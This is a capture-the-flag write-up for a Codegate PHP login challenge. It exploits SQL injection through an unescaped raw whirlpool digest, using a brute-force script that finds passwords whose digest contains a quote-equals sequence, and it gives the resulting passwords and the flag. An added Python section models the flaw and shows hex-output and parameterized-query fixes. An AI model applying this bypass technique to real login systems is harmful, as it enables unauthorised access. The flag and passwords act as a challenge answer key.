We were given the source code of this challenge. To get the flag we have to log in as 'admin'. Below is the PHP code:
$flag = "/flag.txt";
$id = $_POST['user_id'];
$ps = $_POST['password'];
mysql_connect("localhost","codegate","codegate");
mysql_select_db("codegate");
// Escaping is applied to the raw POST values ...
$id = mysql_real_escape_string($id);
$ps = mysql_real_escape_string($ps);
// ... but the password is then replaced by a raw binary digest (third argument true)
$ps = hash("whirlpool",$ps, true);
// The unescaped digest is interpolated straight into the query
$result = mysql_query("select * from users where user_id='$id' and user_ps='$ps'");
$row = mysql_fetch_assoc($result);
if (isset($row['user_id'])) {
    if ($row['user_id'] == "admin") {
        echo "hello, admin<br />";
        die(file_get_contents($flag));
    } else {
        die("hello, ".$row['user_id']);
    }
} else {
    msg("login failed..");
}
The issue is the hash() call: with its third argument set to true it returns raw binary data, and because mysql_real_escape_string() runs on the password before hashing, nothing escapes the digest that is interpolated into the query. Any quote byte in the digest therefore breaks out of the string literal, which gives us SQL injection.

string hash ( string $algo , string $data [, bool $raw_output = false ] )

raw_output: When set to TRUE, outputs raw binary data. FALSE outputs lowercase hexits.

To bypass the login, we need a password whose whirlpool digest contains the byte sequence '=' (a single quote followed by an equals sign). The condition then reads user_ps=''='...', which MySQL evaluates as (user_ps='')='...' and compares 0 with a string that converts to 0, so it is true for every row.
<?php
// Try successive integers as passwords and report those whose raw
// whirlpool digest contains the quote-equals sequence
for ($i = 0; $i < 10000000; $i++)
    if (strpos(hash("whirlpool", $i, true), "'='") !== false)
        echo $i."\n";
?>
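To make the escape-then-hash flaw concrete from the defender's side, here is an added Python model of the query construction (not part of the original writeup or the challenge code). It assumes sha512 as a stand-in for whirlpool, since hashlib does not reliably expose whirlpool; both produce 64 raw bytes, which is all the point depends on. It builds the vulnerable query exactly in the page's order (escape, then raw digest), shows that hex output or a parameterized query removes the problem, and includes a check that counts how many small integer passwords produce a digest containing a quote byte.

```python
import hashlib

# Stand-in for mysql_real_escape_string(): backslash-escape the characters
# MySQL treats specially inside a quoted string literal.
_ESCAPES = {
    "\\": "\\\\", "'": "\\'", '"': '\\"',
    "\0": "\\0", "\n": "\\n", "\r": "\\r", "\x1a": "\\Z",
}


def mysql_escape(s: str) -> str:
    return "".join(_ESCAPES.get(ch, ch) for ch in s)


def raw_digest(password: str) -> str:
    # ASSUMPTION: sha512 stands in for whirlpool (64 raw bytes either way).
    # latin-1 maps each byte to one character, mirroring PHP's byte strings,
    # so this models hash($algo, $ps, true).
    return hashlib.sha512(password.encode()).digest().decode("latin-1")


def hex_digest(password: str) -> str:
    # Models hash($algo, $ps, false): lowercase hex, only [0-9a-f].
    return hashlib.sha512(password.encode()).hexdigest()


def build_query_vulnerable(user_id: str, password: str) -> str:
    uid = mysql_escape(user_id)
    ps = mysql_escape(password)   # escaping happens here ...
    ps = raw_digest(ps)           # ... and is undone by the raw digest
    return f"select * from users where user_id='{uid}' and user_ps='{ps}'"


def build_query_hex(user_id: str, password: str) -> str:
    # Minimal fix: hex output can never contain a quote, backslash or NUL.
    uid = mysql_escape(user_id)
    ps = hex_digest(password)
    return f"select * from users where user_id='{uid}' and user_ps='{ps}'"


def build_query_parameterized(user_id: str, password: str):
    # Preferred fix: statement text and values travel separately, so the
    # content of either value cannot alter the statement's structure.
    return ("select * from users where user_id=%s and user_ps=%s",
            (user_id, hex_digest(password)))


def digest_breaks_out(password: str) -> bool:
    # True when the raw digest contains a byte that ends the quoted literal.
    return "'" in raw_digest(password)


def count_breakouts(limit: int) -> int:
    # How many of the passwords "0".."limit-1" yield a quote byte in the
    # raw digest; about 22% is expected for 64 random bytes.
    return sum(digest_breaks_out(str(i)) for i in range(limit))


def literal_structure_ok(query: str) -> bool:
    # Cheap audit check for this one query shape: a well-formed statement
    # has exactly four quote characters (two per literal) once escaped
    # quotes are discounted.
    unescaped = query.replace("\\\\", "").replace("\\'", "")
    return unescaped.count("'") == 4


if __name__ == "__main__":
    print("breakouts among first 1000 integer passwords:", count_breakouts(1000))
    print("hex query well formed:", literal_structure_ok(build_query_hex("admin", "pw")))
```

The hex form is the one-line fix for this code base (drop the `true`), but the parameterized form is the change worth making, since it also covers the `user_id` path should the escaping ever be removed.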
[ctf@renorobert CodeGate]# php brute.php
364383
527980
629987
708365
991410
1311789
1608604
1974557
^C

Logging in with any of the above passwords bypasses the login. The flag for the challenge is DAER0NG_DAER0NG_APPLE_TR33